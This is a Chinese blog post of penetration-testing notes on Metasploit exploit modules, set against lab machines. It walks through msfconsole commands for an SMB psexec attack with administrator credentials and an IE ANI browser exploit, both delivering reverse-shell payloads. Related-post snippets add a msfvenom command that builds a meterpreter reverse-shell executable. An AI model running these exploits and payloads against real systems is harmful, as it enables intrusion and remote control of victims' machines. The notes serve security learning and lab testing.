【渗透测试笔记】之【MSF Exploit模块】

最新推荐文章于 2024-03-29 10:11:31 发布
最新推荐文章于 2024-03-29 10:11:31 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 渗透测试 Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/109503151
版权

Exploit

Active exploit

主动连接,需要目标关闭防火墙。

win8利用smb漏洞演示:

# 使用漏洞模块
msf5 > use exploit/windows/smb/psexec
# 查看选项
msf5 exploit(windows/smb/psexec) > show options
# 配置必要参数(目标主机地址,用户名密码等)
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.172.132
msf5 exploit(windows/smb/psexec) > set smbuser administrator
msf5 exploit(windows/smb/psexec) > set smbpass 123.com
# 设置payload
msf5 exploit(windows/smb/psexec) > set payload windows/shell/reverse_tcp
# 执行命令(-j为后台执行)
msf5 exploit(windows/smb/psexec) > run -j
# 查看已经建立的session
msf5 exploit(windows/smb/psexec) > sessions
# 连接某个shell(-i后为id号)
msf5 exploit(windows/smb/psexec) > sessions -i 4

获得shell:
在这里插入图片描述

Passive Exploit

被动连接,诱使其连接。

win3 IE图片加载漏洞演示:

# 使用模块
msf5 exploit(windows/smb/psexec) > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
# 查看适用目标
msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show targets
# 查看配置选项
msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options
# 指定伪造网址ip
msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.172.129
# 设置反弹shell payload
msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
# 设置接收反弹shell端口(默认4444)
msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set lport 5555
# 开始执行
msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > run
# 诱使目标主机访问本机:http://192.168.172.129:80/
# 获取shell
msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions -i 1
AA8j
关注
专栏目录
[渗透测试笔记] 19.msf初步
H4ppyD0g的博客
05-05 571
msf利用浏览器漏洞渗透 这里利用IE6和漏洞ms10_018 原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。 msfconsole启动msf search ms10_018查看相关漏洞 use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块 set LHOST 192.168.2...
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8011
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
MSF Exploit入侵电脑实践(Win7/Win10皆可)
xiaohujiang的博客
07-10 5890
msf exploit入侵电脑(Win7/Win10皆可) 需要的工具:msfvenom . msfconsole (kali里面有) msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o xss.exe msfven
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
最新发布
2201_75735270的博客
03-29 3601
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
内网渗透笔记——msf
wang_zui_zui的博客
01-22 4738
Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000 //发包的极限速度 masscan 0.0.0.0/0 -p 0-65535 //扫描整个互联网的所有端口 不要轻易尝试....... Metasploit(msf) 一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击 早期想要利用漏洞——需知道漏洞的poc和exp...
msf加载额外模块
m0_53748188的博客
02-26 365
msf加载模块
渗透测试笔记之浅谈MSFexploit开发(禁止盗版)
南城无笙的Blog
08-08 527
根据作者所学知识,写下本篇文章,msf全程metasploit framework,是一款十分出色的漏洞利用工具本篇文章不对具体的编写做过多介绍,只介绍思路。 基本知识 想要编写exploit,需要了解基本知识,先来了解寄存器,寄存器此处暂且提到三个,即ebp栈底指针寄存器,ESP栈顶指针寄存器,eip指令寄存器,其中最为重点的就要数eip寄存器了,想要运行shellcode获得shell,就要改写eip指针指向jmpesp指针,指向shellcode,从而获得shell。那么此处还要引入一个概念,即缓冲区
msf添加域控
weixin_50683638的博客
04-29 286
1、此篇文章仍与上续几篇msf相关,结合一下,作为此章节的笔记。 2,在msf中有很多模块,各模块用法就不一一赘述,简单说下所需要的模块内容。用这个模块来迁移进程,让meterpreter和session在同位。设置需要迁移进程的session。 3、添加路由run autoroute -s 192.168.1.0/24 run autoroute -p 4、扫描内网 use post/windows/gather/arp_scanner 设置需要扫描内网的ip和端口 再用use auxiliary
【内网渗透】MSFexploit和pyload的基础使用
qq_37870222的博客
04-24 1534
【内网渗透】MSFexploit和pyload的基础使用1、连接MSFroot@kali:~# msfconsole2、显示所有攻击模块msf > show exploits |more3、寻找攻击模块msf > search ms08_0674、使用攻击模块msf > use /exploits/windows/tftp/tftpd32_long_filename5、显示pa...
网络安全B模块笔记详解)- Windows操作系统渗透测试
weixin_57536426的博客
12-24 1000
(字典路径/usr/share/wordlists/dirb/small.txt)5. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;4. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
Metasploit渗透测试指南 学习笔记
weixin_56223343的博客
12-04 838
阅读《Metasploit渗透测试指南》读书笔记
【Linux_Kali网络渗透测试学习笔记总结(六)】漏洞利用
数据库爆破专家的博客
04-30 4046
网络渗透测试(六):漏洞利用 编写漏洞利用程序(exploit) 的程序代码都不仅费时费力,而且代码的质量直接关系找整个工作环节的成败。因此,渗透人员需要根据目标环境的实际情况对通过公开渠道获取的exploit程序进行相应调整。这种调整工作的技术含量很高,而且这类工作通常都是触类旁通的。掌握相应技能的人员可以举一反三地对很多程序进行调整。强烈建议读者在编写自己的漏洞利用程序之前,先通过公开渠道获取...
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6421
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
dzqxwzoe的博客
02-29 1516
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
MSF常用命令|Metasploit术语
qq_60115503的博客
04-20 1294
渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试者利用系统,应用或服务中的安全漏洞,所进行的攻击行为 流行的攻击技术包括,缓冲区溢出,web应用程序漏洞攻击,以及利用配置错误等,渗透攻击是指由攻击者或者渗透测试者利用系统,应用或服务中的安全漏洞,所进行的攻击行为,流行的攻击技术包括:缓冲区溢出,Web应用程序漏洞攻击,以及利用配置错误等 攻击载荷(Payload) 攻击载荷是我们期望目标系统在被渗透攻击后而执行的代码,在MSF框架中可...
如何从Exploit-DB中添加模块至Metasploit
夜晚将会美丽
11-09 3090
如何从Exploit-DB中添加模块至Metasploit前言1、搜索漏洞信息2、使用searchsploit进行本地搜索3、复制rb文件4、use载入模块 前言 系统:Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux msf版本:metasploit v5.0.41-dev ...
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4835
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
内网渗透——PSExec工具
tomyyyyy
04-16 893
内网渗透——PSExec工具 目录内网渗透——PSExec工具简介工作原理作为渗透工具的缺点使用流程定位域控无IPC连接有IPC连接Msf中的Psexec模块使用技巧remote UAC参考简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。...
网络安全之渗透实战学习
Innocence_0的博客
10-16 1208
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值